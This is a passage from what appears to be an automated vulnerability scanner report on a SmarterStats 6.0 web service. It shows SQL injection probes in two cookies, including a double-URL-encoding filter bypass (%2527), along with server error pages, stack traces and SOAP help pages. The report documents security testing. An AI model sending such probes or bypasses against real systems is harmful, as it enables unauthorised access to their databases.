&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSite2Result&gt;
&lt;/MoveSite2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>





</span>









</body>
</html>

2.11. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=DeleteSiteByName HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}'; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=DeleteSiteByName HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}''; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:41 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 11500
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>DeleteSiteByName</h2>
<p class="intro">Deletes a site that exists in the MRS by using the site name.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/DeleteSiteByName' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteName:</td>
<td><input class="frmInput" type="text" size="50" name="SiteName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DeleteFiles:</td>
<td><input class="frmInput" type="text" size="50" name="DeleteFiles"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/DeleteSiteByName"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;DeleteSiteByName xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteName&gt;<font class=value>string</font>&lt;/SiteName&gt;
&lt;DeleteFiles&gt;<font class=value>boolean</font>&lt;/DeleteFiles&gt;
&lt;/DeleteSiteByName&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;DeleteSiteByNameResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;DeleteSiteByNameResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/DeleteSiteByNameResult&gt;
&lt;/DeleteSiteByNameResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;DeleteSiteByName xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteName&gt;<font class=value>string</font>&lt;/SiteName&gt;
&lt;DeleteFiles&gt;<font class=value>boolean</font>&lt;/DeleteFiles&gt;
&lt;/DeleteSiteByName&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;DeleteSiteByNameResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;DeleteSiteByNameResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/DeleteSiteByNameResult&gt;
&lt;/DeleteSiteByNameResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/DeleteSiteByName?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteName</font>=<font class=value>string</font>&amp;<font class=key>DeleteFiles</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/DeleteSiteByName HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteName</font>=<font class=value>string</font>&amp;<font class=key>DeleteFiles</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.12. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STTTState cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the STTTState cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=GetRequestedSettings HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=%2527; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetRequestedSettings HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=%2527%2527; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 7722
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

